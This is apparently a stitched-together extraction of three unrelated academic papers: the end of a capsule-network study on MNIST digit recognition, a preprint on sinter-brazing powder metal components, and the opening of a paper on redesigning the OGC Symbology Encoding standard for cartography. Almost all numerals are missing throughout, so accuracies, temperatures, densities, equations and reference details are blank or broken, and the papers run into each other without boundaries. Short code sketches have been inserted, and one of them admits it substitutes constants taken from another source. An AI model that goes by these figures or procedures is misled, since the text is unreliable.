similar the pose information of $\hat{u}_{j|i}$ and $v_j$, the greater the value of $b_{ij}$, which indicates that the coupling degree between the previous-layer capsule i and the high-level capsule j is higher. the dynamic routing algorithm focuses on clustering similar parts together and then forming a larger-granularity identification module. if the dot product of the predicted vector $\hat{u}_{j|i}$ and the output $v_j$ of one of the high-level capsules is very large, the relationship between this lower-layer node and that high-level capsule will be strengthened after a reflection from front to back, that is to say, the coupling coefficient will be increased; at the same time, the coupling coefficients with the other high-level capsules are reduced. after r iterations, the outputs of all high-level capsules are counted and the relevant routing parameters are determined; forward propagation then enters the next capsule layer of the capsule network. d. loss function the traditional cross-entropy function only supports the scenario of a single classification, so it is not suitable for the capsule network. in order to distinguish multiple classifications in a picture, the edge (margin) loss function is used as the objective function of model optimization for each digital capsule k. it is shown in the following formula: $$ L_k = T_k \max(0,\, m^{+} - \lVert v_k \rVert)^2 + \lambda\, (1 - T_k)\, \max(0,\, \lVert v_k \rVert - m^{-})^2 $$ in the above formula, k is the classification, $T_k$ is the indicator function of the classification, and $L_k$ is the calculated loss; if and only if classification k exists, $T_k$ is ; if classification k does not exist, $T_k$ is . $\lVert v_k \rVert$ represents the length of $v_k$, which is the probability that the digit k exists. $m^{+}$ and $m^{-}$ are thresholds indicating the strength of the connection between the capsules: when the length is lower than . , it is considered that there is no connection relationship at all, and it is regarded as a complete connection if it is higher than . . in detail, $m^{+}$ is the upper edge threshold, which deals with the situation where the classification does not exist but is predicted; $m^{-}$ is the lower edge threshold, which deals with the situation where the classification does exist but is not predicted by the network. $\lambda$ is called the sparsity coefficient and is used to adjust the weight between the two thresholds; the values used for $m^{+}$, $m^{-}$ and $\lambda$ are . , . and . . adding up the loss $L_k$ of each digit gives the overall loss of the network. iv. experiment a. experimental environment table ii. experimental environment. operating system: windows (ram . gb); cpu: intel(r) core(tm) i - h; gpu: nvidia geforce gtx ti; dataset: mnist; other: pytorch . . +cu , python . . . b. experimental data analysis the mnist handwritten digit database is widely used in image recognition and classification. the sample images in mnist are × pixels, and the data set includes four files: training set images, training set labels, test set images and test set labels.
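a runnable sketch of the routing-by-agreement loop and the margin (edge) loss described above is given below. the numeric constants (m+ = 0.9, m− = 0.1, λ = 0.5 and 3 routing iterations) are taken from sabour et al. because the exact values are elided in the text, and modelling the paper's "main" and "secondary" routes as two successive calls of the same routine with configurable iteration counts is an assumption about the deep variant, not a verbatim reimplementation.

```python
import torch
import torch.nn.functional as F


def squash(s, dim=-1, eps=1e-8):
    # compress the norm of s into [0, 1) while keeping its direction
    sq = (s ** 2).sum(dim=dim, keepdim=True)
    return (sq / (1.0 + sq)) * s / torch.sqrt(sq + eps)


def dynamic_routing(u_hat, num_iterations=3):
    """routing by agreement.

    u_hat: (batch, n_lower, n_upper, dim) prediction vectors u_hat_{j|i}.
    returns v: (batch, n_upper, dim), the higher-level capsule outputs.
    """
    b_ij = torch.zeros(u_hat.shape[:3], device=u_hat.device)   # routing logits b_ij = 0
    for _ in range(num_iterations):
        c_ij = F.softmax(b_ij, dim=2)                           # coupling coefficients
        s_j = (c_ij.unsqueeze(-1) * u_hat).sum(dim=1)           # s_j = sum_i c_ij * u_hat_{j|i}
        v_j = squash(s_j)                                       # v_j = squash(s_j)
        b_ij = b_ij + (u_hat * v_j.unsqueeze(1)).sum(dim=-1)    # agreement u_hat . v_j
    return v_j


def margin_loss(v, targets, m_pos=0.9, m_neg=0.1, lam=0.5):
    """edge/margin loss L_k summed over the digit capsules.

    v: (batch, num_classes, dim) digit capsule outputs, targets: (batch,) labels.
    """
    lengths = v.norm(dim=-1)                                    # ||v_k||
    t = F.one_hot(targets, num_classes=v.size(1)).float()       # T_k
    per_class = (t * F.relu(m_pos - lengths) ** 2
                 + lam * (1.0 - t) * F.relu(lengths - m_neg) ** 2)
    return per_class.sum(dim=1).mean()


# hypothetical wiring with the encoder sketched earlier:
#   u_hat = encoder(images)                       # (batch, 1152, 10, 16)
#   v = dynamic_routing(u_hat, num_iterations=3)  # "main" route
#   loss = margin_loss(v, labels)
# a "secondary" routing pass over a further capsule layer would call
# dynamic_routing again on that layer's prediction vectors.
```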
these files are binary files, each pixel of which is converted to a number between and , where is white and is black. the training set has handwritten training samples. its function is to fit model parameters, such as calculating offset and weight. the test set has samples, and its function is to test the final effect of the model. ) precision of capsule network test figure . test precision chart of capsule network under epochs as shown in figure , the highest accuracy of this training is . % in the th epoch. ) test precision of deep capsule network figure . test accuracy chart of deep capsule network under epochs international journal of advanced network, monitoring and controls volume , no. , as shown in figure , the highest accuracy of this training is . % in the rd epoch. ) when epoch = , the final test accuracy of capsule network is . % figure . test precision chart of capsule network under epochs ) when epoch = , the final test accuracy of deep capsule network is . % figure . test accuracy chart of deep capsule network under epochs ) accuracy comparison between deep capsule network and capsule network figure . comparison between the accuracy of capsule network and deep capsule network as shown in figure , it can be seen that the test accuracy of the deep capsule network in a short epoch increases faster than the accuracy of the capsule network and the recognition accuracy is also higher, under the same conditions. ) performance of deep capsule networks with the same two routes: , , , figure . impact of changing the number of routing iterations on the deep capsule network as shown in the figure , it shows that the number of route iterations is not the more the better, which should be obtained according to the specific experiment of network structure. in a smaller training period, it is more appropriate to select the number of iterations of the primary route times and the number of iterations of the secondary route times. when the two routing iterations are different as to figure . figure . influence of different iteration times of two routes on deep capsule network figure . influence of the same number of two routing iterations on deep capsule network international journal of advanced network, monitoring and controls volume , no. , as shown in the figure , the training time and classification accuracy of the network are compared under different collocation times of "primary route" and "secondary route". from the analysis of the data in the table, if only from the classification accuracy, the combination of "main route" iteration twice and "secondary route" iteration three times is the best, but the training time is long. if the training time and classification accuracy are considered comprehensively, the primary route is best to be iterated once and the secondary route is iterated twice. c. reconstruction in order to understand the reconstructed picture, use the imshow function of matplotlib to draw and visualize, then the input picture and the reconstructed picture are shown in the following figure: figure . schematic diagram of some pictures in mnist database figure . schematic diagram of reconstructed image from the comparison, we can see that the reconstructed digital image is clearer and smoother than the input image. it can be inferred that the reconstructed image has the function of smoothing noise. d. 
separation of overlapping handwritten numerals in the same way, we train the overlapped handwritten digital images with deep capsule network, and finally put the vectors into the decoder to decode the reconstructed images. some of them are shown in figure , and the separation effect is basically accurate. figure . comparison of input and output images of the network figure shows the three separation effects' 'and' ',' 'and' ', ' 'and' '. it is obvious that the network has been able to separate two completely coincident handwritten digits. even if' 'and' 'overlap and it is difficult for human eyes to separate them, the network can still successfully separate them, with an accuracy rate of . % .the accuracy rate of collaterals was only . %. figure . partial reconstruction results of the improved network figure . improved partial error reconstruction results however, the situation shown in figure still exists in the reconstructed picture. the original overlapping picture is the overlap of the numbers ' ' and ' '. the two reconstructed images are like ' ', without ' ', the reconstruction is wrong, the error rate after the improvement is still . %. international journal of advanced network, monitoring and controls volume , no. , v. conclusion the deep capsule network model in this paper is based on the characteristics and shortcomings of the capsule network. on the one hand, it retains the advantages of capsule network in understanding the attitude of objects; on the other hand, in view of the shortcomings of capsule network, the convolution kernel size of convolution layer is optimized, and the dynamic routing process is improved to twice routing. the final deep capsule network not only retains the advantages of traditional capsule network, but also improves the performance. references [ ] hinton g e, krizhevsky a, wang s d. transforming auto- encoders[c]//international conference on artificial neural networks. springer, berlin, heidelberg, : - . [ ] he k, zhang x, ren s, et al. deep residual learning for image recognition[c]//proceedings of the ieee conference on computer vision and pattern recognition. : - . [ ] hinton, geoffrey e.; sabour, sara; frosst, nicholas. matrix capsules with em routing. . [ ] kosiorek a, sabour s, teh y w, et al. stacked capsule autoencoders[c]//advances in neural information processing systems. : - . [ ] krizhevsky a, sutskever i, hinton g e. imagenet classification with deep convolutional neural networks[c]//advances in neural information processing systems. : - . [ ] lecun y, bottou l, bengio y, et al. gradient-based learning applied to document recognition[j]. proceedings of the ieee, , ( ): - . [ ] lecun, yann, corinna cortes, and christopher jc burges. "the mnist database of handwritten digits, ." url http://yann. lecun. com/exdb/mnist ( ): . [ ] netzer, yuval, et al. "reading digits in natural images with unsupervised feature learning." ( ). [ ] rumelhart d e, hinton g e, williams r j. learning representations by back-propagating errors[j]. nature, , ( ): - . [ ] sabour s, frosst n, hinton g e. dynamic routing between capsules[c]//advances in neural information processing systems. : - . [ ] szegedy c, liu w, jia y, et al. going deeper with convolutions[c]//proceedings of the ieee conference on computer vision and pattern recognition. : - . [ ] zhao w, ye j, yang m, et al. investigating capsulenetworks with dynamic routing for text classification[j].arxiv preprint arxiv: . 
, easychair preprint № a study on the sinter brazing joint of powder metal components pujan tripathi and george yang easychair preprints are intended for rapid dissemination of research results and are integrated with the rest of easychair. november , a study on the sinter brazing joint of powder metal components pujan tripathi and george yang department of engineering technology missouri western state university downs drive st. joseph, mo , usa abstract: the research focuses on the development of a new joint method, the sinter brazing of powder metal components. various kinds of powder metallurgy composition were tested in the sinter brazing joint, mainly to study the operating conditions, strength of the joint. although each of these processes brings about different results in metal, all of them involve three basic steps: heating, soaking, and cooling. heat treatment such as heating, soaking, cooling, hardening, tampering has been investigated. introduction: powder metallurgy is a processing method where green parts are compacted using dies and get sintered. sintering offers equivalent strength as a cast iron and superior design flexibility and produces near-net- shaped (nns) parts at lower costs and it reduces the need for the machining process. now, sinter brazing is an established joining process for powder metal components, and it is often used in the production of automotive applications. a successfully brazed joint relies widely on the interaction between brazing alloy, the joining surfaces, and sintering atmosphere conditions. the purpose of testing brazing materials is to test the capabilities of the brazing filler materials in order to produce sinter brazed components, processed through sinter brazing to heat treatment with air quench and to compare different brazing pastes to determine their quality and strength to the powder metal components. product designs within the powder metal industries utilize joining techniques to assemble a component from different compacted pieces. this enables pm industries to provide cost-effective complex parts for various applications compared to traditional fabrication practices. sinter-brazing is one of the methods for joining the parts easily and efficiently. brazing mechanism can be complex; however, it has the potential to reduce additional processing steps in a manufacturing scenario. the process can be achieved within one step instead of the traditional two steps. it also has economic advantages [ ]. the metallic bond formed between parent mental surfaces has an adequate strength to achieve the high-performance standards according to the requirements. interconnected porosity generates significant capillary forces that rapidly pull braze away from the connection interface. moreover, the pore network becomes like a conduit that fills the bulk of the part with filler materials which results in a joint deficiency. therefore, porosity is a considerable challenge in the sinter-brazing process. using copper (cu) to infiltrate before brazing can be a potential solution to fill the pore network but is an expensive process. another option is compressing to densities > . g/cm [ ] but has a risk to get reduced strength than expected in the connection interface. burgess norton mfg. co. (geneva illinois) is making powder metal products since and operating seven facilities all over the world. -mpif flc: is a widely used filler alloy for infiltration during the sinter-brazing process by burgess norton. 
this alloy limits the loss of material in the pore network and creates a strong bond between the parent metal surfaces. this can be achieved by increasing the liquid temperature to increase the surface tension, thus reducing the flowability to prevent braze alloy to penetrate further. however, the process is not entirely smooth and influenced by many external parameters. despite having a high success ratio, it has occasional failure due to excessive infiltration. significant work has been done to understand this challenge within manufacturing. one of the methods to counter excessive infiltration is to add some iron powder to the braze pre-mix to influence the onset of solidification temperature [ , ]. brazing has many established best practices [ , , ]. performing each step of the sintering cycle within the controlled environment is one critical factor. to have an effective relubrication without shooting, a little oxidizing is required within the preheat zone. although, some surface contaminants can negatively influence wetting and hinder braze from flowing through a gap. the excessive oxidizing atmosphere can cause inefficiency in reducing the brazing material, a greenish tint on the surface indicates excessive oxidation [ ]. also, furnace temperature should be adjusted for different loads. furthermore, maintaining consistent temperature is essential to regulate desired brazing metal flow. slow heating rates can segregate braze from ler melting constituents and alloy with an iron after re-solidification, impeding the remaining brazing metal from flowing into the pore network [ ]. for successful brazing, wetting parent material surfacing with liquid braze is one of the key factors. it is important to dissolve the surface oxides by utilizing a flux on brazing and parental material to prevent braze to flow into the pore network within the joint [ ]. however, in that process, glassy residues of metal oxides are left behind which can be adherent in nature. thus, it is recommended to incorporate blind holes or enclosed cavities within the design. regardless, if not performed in a vacuum chamber, adding flux is essential in the sinter-brazing process. traditionally, sinter-brazing was performed with -mpif flc: and sintering in a furnace cycle process. but to challenge the capabilities of sinter brazing materials and its components, another test took a place and the research done with the powder -mpif flc- which showed the significant results in the sinter brazing procedure. materials and methods: the braze alloys that are used in the study are, brazing powder -mpif flc: and - mpif flc- . these are the two most used powder of burgess norton mfg. co. (geneva illinois). the sinter brazing paste is used scm-sinter braze grade:c- and scm-sinter braze grade: exp - . type grade description pre-alloyed steel fl- low alloy steel with pre alloyed manganese, molybdenum and nickel content for better hardenability. hybrid-alloy steel fln - , fln - , fln - , fln - , flnc- , low alloy steel with pre alloyed molybdenum and admixed nickel and copper for better compressibility. table: for the procedure weight of the powder used . to . grams. selected tsi is to . and the pressure used to test the shear strength is , lbs to , lbs.for the testing density needed was . to . g/cm^ . brazing slugs weighted length of . mm, width . mm and approximate height of . mm. brazing material used a sinter brazing paste and in which the weight of the paste used around . to . grams. 
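as a small worked example of the density requirement quoted above (illustrative only, not the study's actual tooling; the function names are hypothetical and the target window values are those stated in the procedure, which are not reproduced here), the green density of a rectangular compacted slug can be checked from its mass and dimensions:

    def green_density_g_per_cm3(mass_g, length_mm, width_mm, height_mm):
        # convert the slug dimensions from mm to cm and divide mass by volume
        volume_cm3 = (length_mm / 10.0) * (width_mm / 10.0) * (height_mm / 10.0)
        return mass_g / volume_cm3

    def within_target(density_g_per_cm3, low, high):
        # 'low' and 'high' stand for the target density window stated in the procedure
        return low <= density_g_per_cm3 <= high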
molybdenum- nickel-steel- pre alloyed- as sintered table: molybdenum-nickel steel – pre-alloyed – heat-treated table: reference: https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels.[ ] method: make slugs of powder brazing powder -mpif flc: and -mpif flc- , the basic requirement for making slugs is to get a density of . to . g/cm^ . once the density and slugs are made use sinter brazing paste on both the different products. once the brazing material is applied the brazed parts are ready for sintering. sintering is effective when the process reduces the porosity and enhances properties such as strength, electrical conductivity, transparency and thermal conductivity; yet, in other cases, it may be useful to increase its strength but keep its gas absorbency constant as in filters or catalysts. during the firing process, atomic diffusion drives powder surface elimination in different stages, starting from the formation of necks between powders to the final elimination of small pores at the end of the process. in a furnace, test brazed parts are heated for hours cycle and at c temperature. once the sintering is done slugs were being tested for the shear strength. once the product is sintered then there are two possibilities for the heat treatment, there might be a chance that the product might get melt, or its bond gets stronger. but there are high chances that the product gets melted. after the sintering the https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels heat treatment took place, heat treatment is any one of several controlled heating and cooling operations used to bring about the desired change in the physical properties of a metal. its purpose is to improve the structural and physical properties for some particular use or for future work of the metal. there are five basic heat-treating processes: hardening, case hardening, annealing, normalizing, and tempering. although each of these processes brings about different results in metal, all of them involve three basic steps: heating, soaking, and cooling. heat treatment steps are as followed, heating, soaking, cooling, hardening, tampering. following the heat treatment process was air quenching carburizing process. specification of this process, a cycle – air cooled, endo gas carburizing, deep freeze tempering – °c – °c the following figure illustrates the method to use the universal tester machine to separate the two brazed components, to calculate shear strength. this device is measuring the rupture strength. shear strength is calculated by the following procedure:  drill a . " ( . mm) diameter hole by . " ( . mm) deep through the center of braze  place a . " dowel pin in the hole and push down with tensile tester until part splits  record reading = breaking load results and conclusion: the research took place at burgess norton mfg. [ ]. co. the test showed that the brazing paste scm- sinter braze grade: exp - showed a significant increase in strength in comparison to the scm-sinter braze grade:c- paste. the exp - paste was also not affected by the heat treat operation (typically weakens). this was a significant finding because no other sinter brazing process are currently heat-treating parts after they have been brazed due to the weakening of the bond. powder - rohs compliant exp - . . ht . . . . shear strength (psi) summary reference: burgess norton mfg. co. [ ] references: . gabrielov, c. wilson, and j. 
hamill, “sinter-brazing automotive powertrain components,” international journal of powder metallurgy, vol. , , , pp - . . m. frank, “advanced sinter brazed p/m subassemblies in torque transfer systems: reduction hubs and carriers,” sae, . . m. onoda, r. kameda, and t. koiso, “application of sinter-brazing,” metal powder report, november , pp – . . p. beiss, “finishing processes in powder metallurgy,” powder metallurgy, , , , pp - . . m. stromgren and o. andersson, “brazing of p/m parts by sintering,” technical report - pm - . . w. knopp, brazing alloy composition, united states patent , , feb. , . . r. peaslee, “how to identify brazing failures,” advanced materials & processes, december , p . . aws committee, brazing manual, , american welding society, new york, ny. . burgess norton mfg. co. . https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels. https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels a redesign of ogc symbology encoding standard for sharing cartography a redesign of ogc symbology encoding standard for sharing cartography erwan bocher ,* and olivier ertz ,* cnrs, lab-sticc laboratory, umr , vannes, france media engineering institute, heig-vd, university of applied sciences and arts western switzerland, yverdon-les-bains, vaud, switzerland * these authors contributed equally to this work. abstract despite most spatial data infrastructures offering service-based visualization of geospatial data, requirements are often at a very basic level leading to poor quality of maps. this is a general observation for any geospatial architecture as soon as open standards as those of the open geospatial consortium (ogc) are applied. to improve the situation, this paper does focus on improvements at the portrayal interoperability side by considering standardization aspects. we propose two major redesign recommendations. first to consolidate the cartographic theory at the core of the ogc symbology encoding standard. secondly to build the standard in a modular way so as to be ready to be extended with upcoming future cartographic requirements. thus, we start by defining portrayal interoperability by means of typical-use cases that frame the concept of sharing cartography. then we bring to light the strengths and limits of the relevant open standards to consider in this context. finally we propose a set of recommendations to overcome the limits so as to make these use cases a true reality. even if the definition of a cartographic-oriented standard is not able to act as a complete cartographic design framework by itself, we argue that pushing forward the standardization work dedicated to cartography is a way to share and disseminate good practices and finally to improve the quality of the visualizations. subjects spatial and geographic information systems, world wide web and web science keywords cartography, spatial data infrastructure, open standards, portrayal interoperability, open geospatial consortium introduction given how good geospatial technologies take advantage of the constant evolution of information and communication technologies, spatial data infrastructure (sdi) appeared as a new paradigm in geospatial data handling. it extends desktop gis (craglia, ) where data collected by other organizations can be searched, retrieved and manipulated for several usages (tóth et al., ). 
many regional, national and international initiatives have setup well-defined access policies to promote the arrangement of sdi because location information is important in managing everything that a governance has to organize. currently, several sdi initiatives are particularly well implemented to encourage data discovery and sharing across different communities with various applications. also service-based visualization of geospatial data is part of the sdi components. in the case of how to cite this article bocher and ertz ( ), a redesign of ogc symbology encoding standard for sharing cartography. peerj comput. sci. :e ; doi . /peerj-cs. submitted may accepted december published january corresponding author olivier ertz, olivier.ertz@heig-vd.ch academic editor gabriella pasi additional information and declarations can be found on page doi . /peerj-cs. copyright bocher and ertz distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:olivier.�ertz@�heig-vd.�ch https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ inspire, the infrastructure for spatial information in europe, requirements are defined at a basic level according to inspire drafting team ( ), in section , and inspire drafting team ( ) in section a. , which defines only general portrayal rules as recommendations. as an example, we may notice the technical guidelines on geology (inspire thematic working group geology, ) which does not specify styles required to be supported by inspire view services (section . ) but only recommended styles, often simple to excess, just defining some color tables, stroke width and color, spacing for dashed lines and graphic patterns to repeat in a surface or over a line. these are relatively simple to render with current implementation standards in use. extreme simplicity may be intentional for some cases, but it may also reveal limitations from these implementation standards as soon as styles resulting from a cartographic design are more complex (ertz, ). as a consequence, according to hopfstock & grünreich ( ), with cartographic rules defined at such a basic level, portrayal seems to be considered as a concern of second zone, almost ignoring “the importance of visualization for transforming spatial data into useful gi.” even worse, some contemporary maps coming from sdi exhibit a serious lack of knowledge in cartography with many map-makers repeating some basic mistakes. such as maps from eurostat/regional statistics ( ) where population is represented as a choropleth map (e.g., population on st of january in nuts regions). field ( ) points out that the current demand is for quantity, not for quality, and it is the internet (not the discipline of cartography) which is reacting to this demand. hopfstock & grünreich ( ) underline that poor map design results are the consequence of a “too technology- and/or data-driven approach” and propose improvements by making the cartographic design knowledge explicit and operational. beside such a relevant proposition at the design level, this paper has a focus on the implementation level by making portrayal interoperability operational through the improvement of the open standards dedicated to cartography. indeed, interoperability is key for sdi as interconnected computing systems that can work together to accomplish a common task. 
and the presence of open standards is required to allow these different systems to communicate with each other without depending on a particular actor (sykora et al., ). the common task presently in question is about the ability for a user community interconnected by interoperable systems to share a cartography used for the authoring of a map. that is, not only the result of a cartographic rendering built of a set of pixels, but also the underlying cartographic instructions which describe how the map is authored. we can figure out how such an ability would participate to empower all types of users, from the cartographic professionals to data artists, journalists and coders (field, ) to gain useful geographical information by means of cartographic visualizations. an ability that contributes to the power of maps, from tools which enable the sharing of spatial information and knowledge, to collaboration through shared creativity and skills transfer between “produsers” for better decision making (bruns, ). for cartographic portrayal interoperability, many sdi policies, like inspire drafting team ( ), advise the use of standards from open geospatial consortium (ogc) like the styled layer descriptor (sld) (lupp, ) and symbology encoding (se) bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ specifications (müller, ), but it seems these standards were not able to bring to reality the above vision that goes as far as considering sdi as open participation platforms. we might blame the fact that moving from closed monolithic applications to open distributed systems is still under way (sykora et al., ) and that cartography must take effect providing a methodology with a user-oriented approach (hopfstock & grünreich, ). but this paper wants to show how it is also important to have syntactic portrayal interoperability operational with a mature open specification able to standardize the cartographic instructions. we show that the current ogc se standard does offer limited capabilities for describing cartographic symbolizations. then, while we develop some recommendations to improve the situation through more capabilities to customize the map symbology, we also propose some good practices to favor the adoption of the standard by implementors so as to make it really operational for the long term. we believe that these propositions should lead to rich cartographic portrayal interoperability, going further than basic styles. there is no reason sdi users have to be satisfied with often unsuitable maps. from map design to portrayal interoperability clearly, many definitions and types of map exist. as tyner ( ) writes “we all know what a map is, but that definition can vary from person to person and culture to culture.” however, many of them do share the idea of a map as an intellectual construction that is based on the experience and knowledge of the cartographer to manipulate data input according initial hypotheses and its capacity to play with graphic signs (slocum et al., ; tyner, ). furthermore, even if the definition is hard to settle, cartographers have also worked to formalize map syntactics by developing symbol categories and rules to combine them. visual variables are symbols that can be applied to data in order to reveal information. 
largely based on the bertin & berg ( ) classification, several cartographic authors agree with a set of commons visual variables (carpendale, ; maceachren, ; tyner, ): shape, size, hue (color), value, texture, orientation (fig. ). to create a map, they are individually manipulated or piled up by the cartographer in the process to visually map information about point, line and area features to visual variables (maceachren, ; slocum et al., ). this visual mapping is an embellishment design to improve the aesthetic quality and express efficiently a message (wood & fels, ). even if creating map is an aesthetical exercise it is also a science that must respect some rules to make sure that the representation is accurate. a de facto set of best practices based on visual variables has been accepted by the academy of cartographers (montello, ; mcmaster & mcmaster, ). as bertin & berg ( ) explains, the choice of the “right” visual variable, which would be most appropriate to represent each aspect of information, depends on the type of geographical object but also its characteristics (maceachren, ; nicolas & christine, ). for example, like the statistical nature of the data (qualitative, quantitative), raw data must be represented with proportional symbols and a density of values by an areal classification (i.e., a choropleth map). bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these map syntactics are the results of the mainstream cartographic theory and the related design knowledge that help to understand how and why certain displays are more successful for spatial inference and decision making than others. this subject is an important issue to improve map quality at the design phase (hopfstock & grünreich, ). but also at the implementation phase, the theory related to these visual variables to compose map symbols is suitable to drive the definition of a standardized styling language that must be functionally designed and implemented into the geospatial tools making up sdi. in order to explain how such a standardized styling language is an essential piece to enable cartographic portrayal interoperability, let us clarify the related concept of sharing cartography. we consider four use cases typical of sharing levels: � level : discover at this level, sdi users discover pre-styled and ready to be visualized map layers, eventually coming from different systems, they can combine to build a map. for example, it corresponds to the classical geoportal applications offering the user to discover and explore prepared maps and combine prepared layers from various thematics (e.g., map.geo.admin.ch). typically, it does also match with the story of the fictive sdi user mr tüftel in the web portrayal services book (andrae et al., ). mr tüftel wants to unify on the same map the water pipes from his municipality but also the pipes from the municipalities in the neighborhood. these are different data sources he wants to combine in his everyday gis tool. finally, during the discovery of areapoint linesymbol shape size hue value texture orientation variable figure the visual variables of symbols. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ some cartographic facets, the user gains knowledge of the potential of the underlying data sources hosted by the different systems. 
� level : author starting from level , the potential of the underlying data sources may give to the sdi user some ideas of analytical process which requires to create a new style different from the default. for example, this is useful for mr tüftel in the case he would like to create an unified map of water pipes, but with the problem of getting different visualizations of the pipes (e.g., different colors) from the different municipalities. he would then author a common style (e.g., same color) so as to take the control of the whole rendering process. even further, mr tüftel may enrich the analytical process and take benefit of an extra underlying data that classifies each pipe according to its function (either wastewater or rainwater). he would then author a new style (e.g., orange color for wastewater pipes, blue color for rainwater pipes) so as to produce a suitable map to decide where to build the intercommunal water treatment plant. starting from level some specific use cases become relevant: � level : catalog it is about having at disposal style catalogs offering ready-to-use styles, often tailored for specific thematics, e.g., noise mapping color palettes (epa, ). the ability to import such a specialized symbology into users’ tool just avoid to reinvent the wheel in the sense of re-creating the style from scratch. by analogy, the catalog style use case is similar to how the ogc catalog service for metadata works. � level : collaborate the context of this use case is wider and involves several sdi users into a collaborative authoring process. several users contribute to the creation of a common map, each user having specialized skills to complement one another so as to tell stories as maps, each using her(his) own software (ertz, julien & bocher, ). in other words, cartographic portrayal interoperability enable the freedom to the users to work with the tools they are most comfortable and productive with. also, we may notice the educational capacity of this use case. considering a team of people with different levels of skills in cartography, there are offered the chance to share them. as pointed out by iosifescu-enescu, hugentobler & hurni ( ), “the use of standardized exchange languages is commonly considered as the most practical solution for interoperability especially when it is required to collate resources, like data, from various systems,” but also when it is to take the control of a distributed cartographic rendering process. definitely, starting from level , the definition of a standardized styling language is essential to share cartography: that is the underlying cartographic instruction, what we call the symbology code which constitutes a style that describes how a map is authored. such a definition can be achieved in the same way iosifescu-enescu & hurni ( ) try to define a cartographic ontology by considering that “the building blocks for digital map-making are the primary visual variables (color, opacity, texture, orientation, arrangement, shape, size, focus) and the patterns (arrangement, texture, and bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ orientation).” also, another starting point is to consider a map (either general-purpose maps, special-purpose maps or thematic maps) as being composed of some graphic elements (either geometric primitives or pictorial elements). 
this approach matches the ogc se standard which is the standardized styling language (lupp, ) in question here: a style is applied on a dataset to render a map considering a composition of possible symbol elements (called symbolizer) that carry graphical properties (equivalent to visual variables). so as to complete the definition of cartographic portrayal interoperability, fig. shows that such a styling language is at the core of the third stage of the cartographic pipeline, the one dedicated to the style rendering. thus it is to notice that the map layout design which configures a title, a legend, a north arrow, a scale bar, etc. (peterson, ), is out of our scope, as well as the preprocessing stage which is dedicated to the preparation of the dataset to visualize. as an example, building an anamorphic map requires a preliminary processing to generate consistent geometries with preserved shape and topology before styling them. the next part does focus on the technical aspects about how current open standards are able or not to fully meet the conditions of such a cartographic portrayal interoperability. open standards for sharing cartography given the concept of sharing cartography defined by the above four use cases, let us see what are the possibilities and limits to implement them using ogc standards. figure the four stages of the cartographic map design, inspired from nicolas & christine ( ). full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ use case “discover” the ogc web map service (wms) standard (de la beaujardiere, ) is currently the only widely accepted open standard for map visualization which standardizes the way for web clients to request maps with predefined symbolization (iosifescu-enescu, hugentobler & hurni, ). this ability, as illustrated with fig. , does match the use case level allowing to discover ready-to-visualize map layers and to combine them to build maps. figure discovery of ready to be visualized map layers with ogc wms standard. full-size doi: . /peerj-cs. /fig- figure visualization of the grid of map sheets of switzerland ( : , ) through a default cartographic style showing a choropleth symbology based on the year of edition of the sheet. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ just send a simple getmap request to the swisstopo wms server to get a predefined colored map layer to overlay in your web mapping application (fig. ): https://wms.geo.admin.ch/?service=wms&version= . . &request= getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata- kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , the wms getmap operation allows to choose one of the internal styles prepared for a layer by a map-maker (parameter styles). each style is related to one or more datasets attached to the wms server and ready to be used by an end-user. use case “author” the analysis of the use case level described in chapter shows that it is required to establish an open framework able to facilitate decision making through customized maps. iosifescu-enescu ( ) does underline that the wms standard combined with the sld profile and the se is able to fulfill such a requirement. 
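as a complement to the swisstopo getmap url quoted just below, here is a minimal client-side sketch of how such a request can be assembled programmatically (an assumption-laden illustration: it relies on the python requests library, the parameter names are those defined by the wms specification, and the concrete values such as layer name, crs code and bounding box are placeholders to be taken from the server's getcapabilities document):

    import requests

    def get_map(base_url, layer, srs, bbox, width, height,
                version="1.1.1", style="", image_format="image/png"):
        # builds a WMS GetMap request; an empty STYLES value asks for the server-side default style
        params = {
            "SERVICE": "WMS",
            "VERSION": version,          # WMS 1.3.0 would use CRS instead of SRS below
            "REQUEST": "GetMap",
            "LAYERS": layer,
            "STYLES": style,
            "SRS": srs,                  # e.g. an EPSG code advertised by the server
            "BBOX": ",".join(str(v) for v in bbox),
            "WIDTH": str(width),
            "HEIGHT": str(height),
            "FORMAT": image_format,
        }
        response = requests.get(base_url, params=params)
        return response.content          # the rendered map image (e.g. PNG bytes)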
